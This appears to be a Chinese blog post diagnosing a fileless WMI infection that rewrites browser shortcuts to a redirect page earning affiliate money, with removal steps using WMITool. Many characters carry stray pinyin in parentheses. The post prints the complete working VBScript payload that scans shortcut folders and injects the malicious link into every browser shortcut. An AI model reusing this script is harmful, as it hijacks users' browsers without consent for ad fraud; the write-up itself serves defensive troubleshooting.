網(wǎng)絡(luò)中游蕩，不經(jīng)意間就被感染，感染后不痛但是讓人瘙癢煩躁。
首先說明出現(xiàn)的問題，發(fā)現(xiàn)電腦每次開機、不定時（也許這個病毒設(shè)置的就是定時，沒有具體統(tǒng)計）的出現(xiàn) 谷歌瀏覽器、ie瀏覽器 的快捷方式被修改，我修改和還原后沒用，不躲久就又加上惡意網(wǎng)址鏈接了。我已經(jīng)把注冊表、各種瀏覽器的的主頁都更改了，沒用。惡意修改后如下：
eg："C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://hao643.com/?r=wwwww&m=c166
這是我的谷歌瀏覽器被惡意更改后，后果是，每次打開都會跳到 https://www.hao123.com/?tn=97175858_hao_pg，分析這個網(wǎng)址，前面 https://www.hao123.com/，hao123是一個上網(wǎng)導(dǎo)航（Directindustry Web Guide），百度旗下 “核心” 產(chǎn)品。后面的 ?tn=97175858_hao_pg ，tn（是technology的縮寫么?）等號的后面的數(shù)字是推廣員的推廣編號 97175858，_hao_pg ：這個大概表示的就是 “hao” 下的 pg（大概是page的意思），所以說你訪問了這個網(wǎng)址，就會給這個推廣員賺錢。
對了，還有開頭的 http://hao643.com/?r=wwwww&m=c166  ，這個網(wǎng)址就是一個跳板，每次訪問他都會跳到  https://www.hao123.com/?tn=97175858_hao_pg ，暫且留坑，以后搞明白了利弊再分析。

如果你出現(xiàn)了類似的問題，并且檢查過注冊表、更改了瀏覽器的主頁、殺毒軟件查殺過全部系統(tǒng)，但還是沒有效果。

下載火絨安全軟件（https://www.huorong.cn），執(zhí)行病毒檢查，就會提示發(fā)現(xiàn)了WMI病毒，清除即可。

查找資料，發(fā)現(xiàn)這應(yīng)該是一個通過WMI發(fā)起的定時自動運行腳本。要查看WMI事件，到以下地址下載WMITool并安裝，
http://www.cr173.com/soft/88291.html
安裝后打開WMI event viewer，點擊左上角register for events，彈出Connect to namespace框，填入“root\CIMV2” （我的是默認出現(xiàn)的，如果這個不行，可以試試填入“root\subscription”），確定，出現(xiàn)下圖：

Filters 下，也許每個人的情況會不同，但是關(guān)鍵是在右面右鍵點擊 ActiveScript... ，選擇view instance properties ，會出現(xiàn)：

就是這里，ScriptText里面，有Value，我這個感染的代碼是：
On Error Resume Next:Const link = "http://hao643.com/?r=wwwww&m=c166":Const link360 = "http://hao643.com/?r=wwwww&m=c166&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths
 = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\lenovo\Desktop,C:\Users\lenovo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\lenovo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\lenovo\AppData\Roaming\Microsoft\Internet
 Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\lenovo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr
 = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder
 In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path)
 & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End
 If:End If:Next:End If:Next:

查看ScriptText項可知，這是一段VBScript調(diào)用系統(tǒng)服務(wù)間隔30分鐘執(zhí)行一次，將所有瀏覽器調(diào)用加上“http://www.2345.com/?kunown”！抓住你了~！隱藏的夠深，沒常駐進程，沒有文件（把自己存儲在WMI數(shù)據(jù)庫中），靠~！

受到影響的瀏覽器有（各色瀏覽器，差不多齊了）：

"IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe",
 "liebao.exe", "QQBrowser.exe"

最后，清除方法：在WMI event viewer中將“_EventFilter:Name="unown_filter"”項目右鍵刪除！

刪不掉？

到WMITool安裝路徑（例如：C:\Program Files (x86)\WMI Tools）下，右鍵點擊wbemeventviewer.exe，選擇以管理員身份運行！刪之！

還沒完，還要手動將快速啟動欄中，將各個瀏覽器快捷命令中的http://www.2345.com/?kunown去掉！

暫時就這么多了，還有沒有其它影響的話，用用再看吧！

嗯，好歹這蒼蠅到底還是吐出去了！